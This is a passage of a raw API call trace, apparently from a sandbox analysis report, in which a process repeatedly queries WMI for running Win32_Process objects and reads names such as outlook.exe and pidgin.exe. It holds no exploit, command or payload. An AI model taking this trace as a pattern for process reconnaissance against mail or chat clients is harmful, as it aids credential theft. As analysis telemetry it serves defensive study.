[1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e928 | out: ppvObject=0x36e928*=0x0) returned 0x80004002 [0225.447] WbemDefPath:IUnknown:AddRef (This=0x5ec23e8) returned 0x3 [0225.447] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec23e8, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e284 | out: ppvObject=0x36e284*=0x0) returned 0x80004002 [0225.447] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec23e8, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e234 | out: ppvObject=0x36e234*=0x0) returned 0x80004002 [0225.447] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec23e8, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e240 | out: ppvObject=0x36e240*=0x5ebb0c0) returned 0x0 [0225.447] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5ebb0c0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e248 | out: pCid=0x36e248*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0225.447] WbemDefPath:IUnknown:Release (This=0x5ebb0c0) returned 0x3 [0225.448] CoGetContextToken (in: pToken=0x36e2a0 | out: pToken=0x36e2a0) returned 0x0 [0225.448] CoGetContextToken (in: pToken=0x36e6b4 | out: pToken=0x36e6b4) returned 0x0 [0225.448] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec23e8, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e734 | out: ppvObject=0x36e734*=0x0) returned 0x80004002 [0225.448] WbemDefPath:IUnknown:Release (This=0x5ec23e8) returned 0x2 [0225.448] WbemDefPath:IUnknown:Release (This=0x5ec23e8) returned 0x1 [0225.448] CoGetContextToken (in: pToken=0x36f044 | out: pToken=0x36f044) returned 0x0 [0225.448] CoGetContextToken (in: pToken=0x36efa4 | out: pToken=0x36efa4) returned 0x0 [0225.448] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec23e8, riid=0x36f074*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x36f070 | out: ppvObject=0x36f070*=0x5ec23e8) returned 0x0 [0225.448] WbemDefPath:IUnknown:AddRef (This=0x5ec23e8) returned 0x3 [0225.448] WbemDefPath:IUnknown:Release (This=0x5ec23e8) returned 0x2 [0225.448] WbemDefPath:IWbemPath:SetText (This=0x5ec23e8, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2212\"") returned 0x0 [0225.448] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1f0 | out: puCount=0x36f1f0*=0x2) returned 0x0 [0225.448] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0x0, pszText=0x0 | out: puBuffLength=0x36f1ec*=0xf, pszText=0x0) returned 0x0 [0225.448] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1ec*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0225.449] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1bc | out: puCount=0x36f1bc*=0x2) returned 0x0 [0225.449] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0x0, pszText=0x0 | out: puBuffLength=0x36f1b8*=0xf, pszText=0x0) returned 0x0 [0225.449] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1b8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0225.449] IWbemClassObject:Get (in: This=0x5ebc388, wszName="Name", lFlags=0, pVal=0x36f1b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26f4ad0*=0, plFlavor=0x26f4ad4*=0 | out: pVal=0x36f1b8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="outlook.exe", varVal2=0x0), pType=0x26f4ad0*=8, plFlavor=0x26f4ad4*=0) returned 0x0 [0225.449] SysStringByteLen (bstr="outlook.exe") returned 0x16 [0225.449] SysStringByteLen (bstr="outlook.exe") returned 0x16 [0225.449] IWbemClassObject:Get (in: This=0x5ebc388, wszName="Name", lFlags=0, pVal=0x36f1c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26f4ad0*=8, plFlavor=0x26f4ad4*=0 | out: pVal=0x36f1c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="outlook.exe", varVal2=0x0), pType=0x26f4ad0*=8, plFlavor=0x26f4ad4*=0) returned 0x0 [0225.449] SysStringByteLen (bstr="outlook.exe") returned 0x16 [0225.449] SysStringByteLen (bstr="outlook.exe") returned 0x16 [0225.449] CoTaskMemAlloc (cb=0x4) returned 0x5ebb0f0 [0225.449] IEnumWbemClassObject:Next (in: This=0x70f9f0, lTimeout=-1, uCount=0x1, apObjects=0x5ebb0f0, puReturned=0x26dde18 | out: apObjects=0x5ebb0f0*=0x5ebc520, puReturned=0x26dde18*=0x1) returned 0x0 [0225.503] IUnknown:QueryInterface (in: This=0x5ebc520, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e81c | out: ppvObject=0x36e81c*=0x5ebc520) returned 0x0 [0225.503] IUnknown:QueryInterface (in: This=0x5ebc520, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e7d0 | out: ppvObject=0x36e7d0*=0x0) returned 0x80004002 [0225.503] IUnknown:QueryInterface (in: This=0x5ebc520, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36e5f8 | out: ppvObject=0x36e5f8*=0x0) returned 0x80004002 [0225.504] IUnknown:AddRef (This=0x5ebc520) returned 0x3 [0225.504] IUnknown:QueryInterface (in: This=0x5ebc520, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e12c | out: ppvObject=0x36e12c*=0x0) returned 0x80004002 [0225.504] IUnknown:QueryInterface (in: This=0x5ebc520, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e0dc | out: ppvObject=0x36e0dc*=0x0) returned 0x80004002 [0225.504] IUnknown:QueryInterface (in: This=0x5ebc520, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e0e8 | out: ppvObject=0x36e0e8*=0x5ebc524) returned 0x0 [0225.504] IMarshal:GetUnmarshalClass (in: This=0x5ebc524, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e0f0 | out: pCid=0x36e0f0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0225.504] IUnknown:Release (This=0x5ebc524) returned 0x3 [0225.504] CoGetContextToken (in: pToken=0x36e148 | out: pToken=0x36e148) returned 0x0 [0225.504] CoGetContextToken (in: pToken=0x36e55c | out: pToken=0x36e55c) returned 0x0 [0225.504] IUnknown:QueryInterface (in: This=0x5ebc520, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e5dc | out: ppvObject=0x36e5dc*=0x0) returned 0x80004002 [0225.504] IUnknown:Release (This=0x5ebc520) returned 0x2 [0225.504] CoGetContextToken (in: pToken=0x36eb44 | out: pToken=0x36eb44) returned 0x0 [0225.504] CoGetContextToken (in: pToken=0x36eaa4 | out: pToken=0x36eaa4) returned 0x0 [0225.504] IUnknown:QueryInterface (in: This=0x5ebc520, riid=0x36eb74*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36eb70 | out: ppvObject=0x36eb70*=0x5ebc520) returned 0x0 [0225.505] IUnknown:AddRef (This=0x5ebc520) returned 0x4 [0225.505] IUnknown:Release (This=0x5ebc520) returned 0x3 [0225.505] IUnknown:Release (This=0x5ebc520) returned 0x2 [0225.505] CoTaskMemFree (pv=0x5ebb0f0) [0225.505] CoGetContextToken (in: pToken=0x36eeb4 | out: pToken=0x36eeb4) returned 0x0 [0225.505] IUnknown:AddRef (This=0x5ebc520) returned 0x3 [0225.505] IWbemClassObject:Get (in: This=0x5ebc520, wszName="__GENUS", lFlags=0, pVal=0x36f1b4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f234*=0, plFlavor=0x36f230*=0 | out: pVal=0x36f1b4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x36f234*=3, plFlavor=0x36f230*=64) returned 0x0 [0225.505] IWbemClassObject:Get (in: This=0x5ebc520, wszName="__PATH", lFlags=0, pVal=0x36f198*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f21c*=0, plFlavor=0x36f218*=0 | out: pVal=0x36f198*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"1960\"", varVal2=0x0), pType=0x36f21c*=8, plFlavor=0x36f218*=64) returned 0x0 [0225.506] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"1960\"") returned 0x66 [0225.506] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"1960\"") returned 0x66 [0225.506] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f1c4 | out: ppv=0x36f1c4*=0x6ee4bc) returned 0x0 [0225.506] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f1bc | out: pAptType=0x36f1bc*=1) returned 0x0 [0225.506] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f1c0 | out: ppvObject=0x36f1c0*=0x0) returned 0x80004002 [0225.506] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0225.507] CoGetClassObject (in: rclsid=0x761ab4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36eb30 | out: ppv=0x36eb30*=0x5ebb0f0) returned 0x0 [0225.507] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ebb0f0, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36ed48 | out: ppvObject=0x36ed48*=0x0) returned 0x80004002 [0225.507] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5ebb0f0, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ed54 | out: ppvObject=0x36ed54*=0x5ec24c8) returned 0x0 [0225.507] WbemDefPath:IUnknown:Release (This=0x5ebb0f0) returned 0x0 [0225.508] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec24c8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e974 | out: ppvObject=0x36e974*=0x5ec24c8) returned 0x0 [0225.508] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec24c8, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e928 | out: ppvObject=0x36e928*=0x0) returned 0x80004002 [0225.508] WbemDefPath:IUnknown:AddRef (This=0x5ec24c8) returned 0x3 [0225.508] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec24c8, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e284 | out: ppvObject=0x36e284*=0x0) returned 0x80004002 [0225.508] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec24c8, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e234 | out: ppvObject=0x36e234*=0x0) returned 0x80004002 [0225.508] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec24c8, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e240 | out: ppvObject=0x36e240*=0x5ebb100) returned 0x0 [0225.508] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5ebb100, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e248 | out: pCid=0x36e248*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0225.508] WbemDefPath:IUnknown:Release (This=0x5ebb100) returned 0x3 [0225.508] CoGetContextToken (in: pToken=0x36e2a0 | out: pToken=0x36e2a0) returned 0x0 [0225.509] CoGetContextToken (in: pToken=0x36e6b4 | out: pToken=0x36e6b4) returned 0x0 [0225.509] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec24c8, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e734 | out: ppvObject=0x36e734*=0x0) returned 0x80004002 [0225.509] WbemDefPath:IUnknown:Release (This=0x5ec24c8) returned 0x2 [0225.509] WbemDefPath:IUnknown:Release (This=0x5ec24c8) returned 0x1 [0225.509] CoGetContextToken (in: pToken=0x36f044 | out: pToken=0x36f044) returned 0x0 [0225.509] CoGetContextToken (in: pToken=0x36efa4 | out: pToken=0x36efa4) returned 0x0 [0225.509] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec24c8, riid=0x36f074*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x36f070 | out: ppvObject=0x36f070*=0x5ec24c8) returned 0x0 [0225.509] WbemDefPath:IUnknown:AddRef (This=0x5ec24c8) returned 0x3 [0225.509] WbemDefPath:IUnknown:Release (This=0x5ec24c8) returned 0x2 [0225.509] WbemDefPath:IWbemPath:SetText (This=0x5ec24c8, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"1960\"") returned 0x0 [0225.509] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1f0 | out: puCount=0x36f1f0*=0x2) returned 0x0 [0225.509] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0x0, pszText=0x0 | out: puBuffLength=0x36f1ec*=0xf, pszText=0x0) returned 0x0 [0225.509] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1ec*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0225.509] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1bc | out: puCount=0x36f1bc*=0x2) returned 0x0 [0225.509] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0x0, pszText=0x0 | out: puBuffLength=0x36f1b8*=0xf, pszText=0x0) returned 0x0 [0225.509] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1b8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0225.509] IWbemClassObject:Get (in: This=0x5ebc520, wszName="Name", lFlags=0, pVal=0x36f1b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26f533c*=0, plFlavor=0x26f5340*=0 | out: pVal=0x36f1b8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="pidgin.exe", varVal2=0x0), pType=0x26f533c*=8, plFlavor=0x26f5340*=0) returned 0x0 [0225.509] SysStringByteLen (bstr="pidgin.exe") returned 0x14 [0225.509] SysStringByteLen (bstr="pidgin.exe") returned 0x14 [0225.510] IWbemClassObject:Get (in: This=0x5ebc520, wszName="Name", lFlags=0, pVal=0x36f1c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26f533c*=8, plFlavor=0x26f5340*=0 | out: pVal=0x36f1c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="pidgin.exe", varVal2=0x0), pType=0x26f533c*=8, plFlavor=0x26f5340*=0) returned 0x0 [0225.510] SysStringByteLen (bstr="pidgin.exe") returned 0x14 [0225.510] SysStringByteLen (bstr="pidgin.exe") returned 0x14 [0225.510] CoTaskMemAlloc (cb=0x4) returned 0x5ebb130 [0225.510] IEnumWbemClassObject:Next (in: This=0x70f9f0, lTimeout=-1, uCount=0x1, apObjects=0x5ebb130, puReturned=0x26dde18 | out: apObjects=0x5ebb130*=0x5ebc6b8, puReturned=0x26dde18*=0x1) returned 0x0 [0225.512] IUnknown:QueryInterface (in: This=0x5ebc6b8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e81c | out: ppvObject=0x36e81c*=0x5ebc6b8) returned 0x0 [0225.512] IUnknown:QueryInterface (in: This=0x5ebc6b8, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e7d0 | out: ppvObject=0x36e7d0*=0x0) returned 0x80004002 [0225.512] IUnknown:QueryInterface (in: This=0x5ebc6b8, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36e5f8 | out: ppvObject=0x36e5f8*=0x0) returned 0x80004002 [0225.512] IUnknown:AddRef (This=0x5ebc6b8) returned 0x3 [0225.512] IUnknown:QueryInterface (in: This=0x5ebc6b8, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e12c | out: ppvObject=0x36e12c*=0x0) returned 0x80004002 [0225.512] IUnknown:QueryInterface (in: This=0x5ebc6b8, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e0dc | out: ppvObject=0x36e0dc*=0x0) returned 0x80004002 [0225.512] IUnknown:QueryInterface (in: This=0x5ebc6b8, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e0e8 | out: ppvObject=0x36e0e8*=0x5ebc6bc) returned 0x0 [0225.512] IMarshal:GetUnmarshalClass (in: This=0x5ebc6bc, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e0f0 | out: pCid=0x36e0f0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0225.512] IUnknown:Release (This=0x5ebc6bc) returned 0x3 [0225.513] CoGetContextToken (in: pToken=0x36e148 | out: pToken=0x36e148) returned 0x0 [0225.513] CoGetContextToken (in: pToken=0x36e55c | out: pToken=0x36e55c) returned 0x0 [0225.513] IUnknown:QueryInterface (in: This=0x5ebc6b8, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e5dc | out: ppvObject=0x36e5dc*=0x0) returned 0x80004002 [0225.513] IUnknown:Release (This=0x5ebc6b8) returned 0x2 [0225.513] CoGetContextToken (in: pToken=0x36eb44 | out: pToken=0x36eb44) returned 0x0 [0225.513] CoGetContextToken (in: pToken=0x36eaa4 | out: pToken=0x36eaa4) returned 0x0 [0225.513] IUnknown:QueryInterface (in: This=0x5ebc6b8, riid=0x36eb74*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36eb70 | out: ppvObject=0x36eb70*=0x5ebc6b8) returned 0x0 [0225.513] IUnknown:AddRef (This=0x5ebc6b8) returned 0x4 [0225.513] IUnknown:Release (This=0x5ebc6b8) returned 0x3 [0225.513] IUnknown:Release (This=0x5ebc6b8) returned 0x2 [0225.513] CoTaskMemFree (pv=0x5ebb130) [0225.513] CoGetContextToken (in: pToken=0x36eeb4 | out: pToken=0x36eeb4) returned 0x0 [0225.513] IUnknown:AddRef (This=0x5ebc6b8) returned 0x3 [0225.513] IWbemClassObject:Get (in: This=0x5ebc6b8, wszName="__GENUS", lFlags=0, pVal=0x36f1b4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f234*=0, plFlavor=0x36f230*=0 | out: pVal=0x36f1b4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x36f234*=3, plFlavor=0x36f230*=64) returned 0x0 [0225.514] IWbemClassObject:Get (in: This=0x5ebc6b8, wszName="__PATH", lFlags=0, pVal=0x36f198*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f21c*=0, plFlavor=0x36f218*=0 | out: pVal=0x36f198*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"1460\"", varVal2=0x0), pType=0x36f21c*=8, plFlavor=0x36f218*=64) returned 0x0 [0225.514] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"1460\"") returned 0x66 [0225.514] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"1460\"") returned 0x66 [0225.514] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f1c4 | out: ppv=0x36f1c4*=0x6ee4bc) returned 0x0 [0225.514] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f1bc | out: pAptType=0x36f1bc*=1) returned 0x0 [0225.514] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f1c0 | out: ppvObject=0x36f1c0*=0x0) returned 0x80004002 [0225.514] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0225.515] CoGetClassObject (in: rclsid=0x761ab4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, 